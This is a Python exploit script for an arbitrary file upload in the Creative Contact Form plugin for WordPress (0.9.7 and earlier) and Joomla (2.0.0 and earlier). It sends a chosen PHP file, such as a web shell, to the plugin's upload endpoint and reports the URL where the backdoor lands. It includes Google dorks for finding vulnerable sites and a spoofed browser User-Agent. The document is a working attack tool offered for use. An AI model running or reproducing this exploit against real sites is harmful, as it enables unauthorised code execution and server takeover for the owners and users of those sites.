Creative Contact Form (Wordpress 0.9.7 and Joomla 2.0.0)

#!/usr/bin/python

#

# Exploit Name: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability

# Wordpress plugin version: <= 0.9.7

# Joomla extension version: <= 2.0.0

#

# Vulnerability discovered by Gianni Angelozzi

#

# Exploit written by Claudio Viviani

#

# Dork google wordpress: inurl:inurl:sexy-contact-form

# Dork google joomla : inurl:com_creativecontactform

#

# Tested on BackBox 3.x

#

# http connection

import urllib, urllib2, sys, mimetypes

# Args management

import optparse

# file management

import os, os.path

# Check url

def checkurl(url):

if url[:8] != "https://" and url[:7] != "http://":

print('[X] You must insert http:// or https:// procotol')

sys.exit(1)

else:

return url

# Check if file exists and has readable

def checkfile(file):

if not os.path.isfile(file) and not os.access(file, os.R_OK):

print '[X] '+file+' file is missing or not readable'

sys.exit(1)

else:

return file

# Get file's mimetype

def get_content_type(filename):

return mimetypes.guess_type(filename)[0] or 'application/octet-stream'

# Create multipart header

def create_body_sh3ll_upl04d(payloadname):

getfields = dict()

payloadcontent = open(payloadname).read()

LIMIT = '----------lImIt_of_THE_fIle_eW_$'

CRLF = '\r\n'

L = []

for (key, value) in getfields.items():

L.append('--' + LIMIT)

L.append('Content-Disposition: form-data; name="%s"' % key)

L.append('')

L.append(value)

L.append('--' + LIMIT)

L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', payloadname))

L.append('Content-Type: %s' % get_content_type(payloadname))

L.append('')

L.append(payloadcontent)

L.append('--' + LIMIT + '--')

L.append('')

body = CRLF.join(L)

return body

banner = """

___ ___               __                            __,-,__

|   Y   .-----.----.--|  .-----.----.-----.-----.   |  ' '__|

|.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|   |     __|

|. / \  |_____|__| |_____|   __|__| |_____|_____|   |_______|

|:      |    _______     |__|             __           |_|

|::.|:. |   |   _   .-----.-----.--------|  .---.-.

`--- ---'   |___|   |  _  |  _  |        |  |  _  |

|.  |   |_____|_____|__|__|__|__|___._|

|:  1   |

|::.. . |

`-------'

_______                  __   __                 _______             __              __

| _ .----.-----.---.-| |_|__.--.--.-----. | _ .-----.-----| |_.---.-.----| |_

|.  1___|   _|  -__|  _  |   _|  |  |  |  -__|   |.  1___|  _  |     |   _|  _  |  __|   _|

|. |___|__| |_____|___._|____|__|\___/|_____| |. |___|_____|__|__|____|___._|____|____|

|:  1   |       _______                          |:  1   |

|::.. . |      |   _   .-----.----.--------.     |::.. . |

`-------'      |.  1___|  _  |   _|        |     `-------'

|.  __) |_____|__| |__|__|__|

|:  |

|::.|

`---'

Cr3ative C0nt4ct Form Sh3ll Upl04d

Discovered by:

Gianni Angelozzi

Written by:

Claudio Viviani

http://www.homelab.it

info@homelab.it

homelabit@protonmail.ch

https://www.facebook.com/homelabit

https://twitter.com/homelabit

https://plus.google.com/+HomelabIt1/

https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

"""

commandList = optparse.OptionParser('usage: %prog -t URL -c CMS-f FILENAME.PHP [--timeout sec]')

commandList.add_option('-t', '--target', action="store",

help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",

)

commandList.add_option('-c', '--cms', action="store",

help="Insert CMS Type: wordpress|joomla",

)

commandList.add_option('-f', '--file', action="store",

help="Insert file name, ex: shell.php",

)

commandList.add_option('--timeout', action="store", default=10, type="int",

help="[Timeout Value] - Default 10",

)

options, remainder = commandList.parse_args()

# Check args

if not options.target or not options.file or not options.cms:

print(banner)

commandList.print_help()

sys.exit(1)

payloadname = checkfile(options.file)

host = checkurl(options.target)

timeout = options.timeout

cmstype = options.cms

print(banner)

if options.cms == "wordpress":

url_sexy_upload = host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php'

backdoor_location = host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/files/'

elif options.cms == "joomla":

url_sexy_upload = host+'/components/com_creativecontactform/fileupload/index.php'

backdoor_location = host+'/components/com_creativecontactform/fileupload/files/'

else:

print("[X] -c options require: 'wordpress' or 'joomla'")

sys.exit(1)

content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'

bodyupload = create_body_sh3ll_upl04d(payloadname)

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

'content-type': content_type,

'content-length': str(len(bodyupload)) }

try:

req = urllib2.Request(url_sexy_upload, bodyupload, headers)

response = urllib2.urlopen(req)

if "error" in response.read():

print("[X] Upload Failed :(")

else:

print("[!] Shell Uploaded")

print("[!] "+backdoor_location+options.file)

except urllib2.HTTPError as e:

print("[X] Http Error: "+str(e.code))

except urllib2.URLError as e:

print("[X] Connection Error: "+str(e.code))